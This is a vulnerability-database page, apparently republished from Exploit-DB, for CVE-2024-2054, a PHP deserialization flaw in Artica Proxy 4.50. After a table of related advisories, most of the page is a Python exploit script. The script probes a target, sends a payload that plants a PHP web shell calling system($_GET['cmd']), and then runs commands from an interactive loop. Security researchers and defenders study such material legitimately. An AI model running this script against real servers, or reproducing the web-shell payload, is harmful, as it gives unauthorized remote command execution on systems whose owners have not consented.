Artica Proxy 4.50 - Remote Code Execution (RCE)

🗓️ 09 Apr 2025 00:00:00Reported by MadanType

exploitdb🔗 www.exploit-db.com👁 287 Views

Artica Proxy 4.50 has a remote code execution vulnerability through insecure deserialization.

Reporter	Title	Published	Views	Family All 19
0day.today	Artica Proxy 4.50 Unauthenticated PHP Deserialization Vulnerability	6 Mar 202400:00	–	zdt
0day.today	Artica Proxy Unauthenticated PHP Deserialization Exploit	27 Mar 202400:00	–	zdt
GithubExploit	Exploit for Deserialization of Untrusted Data in Articatech Artica_Proxy	25 Mar 202407:01	–	githubexploit
BDU FSTEC	The vulnerability of the Artica Proxy proxy server management system, related to the restoration of unreliable data in memory, allows a hacker to execute arbitrary code on behalf of the “www-data” user.	28 Mar 202400:00	–	bdu_fstec
Circl	CVE-2024-2054	31 Dec 200023:00	–	circl
CNNVD	Artica Proxy Code Issue Vulnerability	9 Mar 202400:00	–	cnnvd
CVE	CVE-2024-2054	5 Mar 202418:56	–	cve
Cvelist	CVE-2024-2054 Artica Proxy Unauthenticated PHP Deserialization Vulnerability	5 Mar 202418:56	–	cvelist
KoreLogic Security	Artica Proxy Unauthenticated PHP Deserialization Vulnerability	5 Mar 202400:00	–	korelogic
Metasploit	Artica Proxy Unauthenticated PHP Deserialization Vulnerability	26 Mar 202419:51	–	metasploit

# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054

you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054


import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")

URL = input("Enter url: ")
if URL[-1]=="/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL

ARTICA_URL = ACTUAL_URL

def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
    except Exception as e:
        print(Fore.RED+"Could not reach, check URL")
    if check.status_code==200:
        print(Fore.GREEN+"Vulnerable")
        return True
    else:
        print(Fore.RED+"Not Vulnerable")


def exploit(ARTICA_URL):

    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }


    while True:
        PAYLOAD_CMD = input("enter command: ")
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        response = requests.get(url, verify=False)
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        if response.status_code == 200:
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")

check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
    exploit(ARTICA_URL=ARTICA_URL)

09 Apr 2025 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 3.19.8

EPSS0.8126

SSVC